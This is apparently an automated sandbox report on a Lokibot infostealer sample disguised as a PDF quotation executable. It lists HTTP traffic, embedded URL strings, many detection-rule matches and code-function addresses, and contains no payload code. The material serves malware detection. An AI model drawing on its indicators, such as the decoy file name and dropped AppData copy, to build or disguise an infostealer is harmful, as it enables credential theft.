                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:34:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:34:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: Quotation2025-0107pdf.exe, mexnJkivovwH.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: Quotation2025-0107pdf.exe, mexnJkivovwH.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: Quotation2025-0107pdf.exe, mexnJkivovwH.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, mexnJkivovwH.exe, 00000009.00000002.1749098659.0000000002449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: mexnJkivovwH.exe, mexnJkivovwH.exe, 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: Quotation2025-0107pdf.exe, mexnJkivovwH.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                    System Summary

                    barindex
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                    Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: Process Memory Space: Quotation2025-0107pdf.exe PID: 7332, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Process Memory Space: mexnJkivovwH.exe PID: 7908, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Process Memory Space: mexnJkivovwH.exe PID: 8124, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: initial sampleStatic PE information: Filename: Quotation2025-0107pdf.exe
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C07F4 NtQueryInformationProcess,0_2_018C07F4
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C9751 NtQueryInformationProcess,0_2_018C9751
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A707F4 NtQueryInformationProcess,9_2_00A707F4
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A79751 NtQueryInformationProcess,9_2_00A79751
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C95580_2_018C9558
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C85680_2_018C8568
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C1CE80_2_018C1CE8
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C14780_2_018C1478
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C27100_2_018C2710
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018CA2980_2_018CA298
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C36100_2_018C3610
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C5DC80_2_018C5DC8
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C35F90_2_018C35F9
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C59080_2_018C5908
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C59180_2_018C5918
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C95470_2_018C9547
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C08D80_2_018C08D8
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C88280_2_018C8828
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C143F0_2_018C143F
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C88380_2_018C8838
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C98600_2_018C9860
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C98700_2_018C9870
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C5BD00_2_018C5BD0
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C5BE00_2_018C5BE0
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C17280_2_018C1728
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C3A8A0_2_018C3A8A
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C56D00_2_018C56D0
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_018C56E00_2_018C56E0
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0305C3240_2_0305C324
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_030514780_2_03051478
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0305C3180_2_0305C318
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0305D3510_2_0305D351
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0305B2080_2_0305B208
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_030591EC0_2_030591EC
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_030514690_2_03051469
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A08B2600_2_0A08B260
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A08B2BC0_2_0A08B2BC
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A0873940_2_0A087394
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A08CF300_2_0A08CF30
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A084D380_2_0A084D38
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B38C00_2_0A1B38C0
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B07300_2_0A1B0730
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1BCB500_2_0A1BCB50
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1BB8B00_2_0A1BB8B0
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B38D90_2_0A1B38D9
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B2C680_2_0A1B2C68
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1BB00E0_2_0A1BB00E
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1BB0400_2_0A1BB040
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B07200_2_0A1B0720
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B04280_2_0A1B0428
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1B04480_2_0A1B0448
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1BB4780_2_0A1BB478
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_0A1BD5380_2_0A1BD538
                    Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exeCode function: 0_2_12512A300_2_12512A30
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A7A2989_2_00A7A298
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A71CE89_2_00A71CE8
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A714789_2_00A71478
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A785709_2_00A78570
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A795589_2_00A79558
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A736109_2_00A73610
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A727109_2_00A72710
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A708D89_2_00A708D8
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A788289_2_00A78828
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A788389_2_00A78838
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A798609_2_00A79860
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A798709_2_00A79870
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A759089_2_00A75908
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A759189_2_00A75918
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 9_2_00A7A2889_2_00A7A288
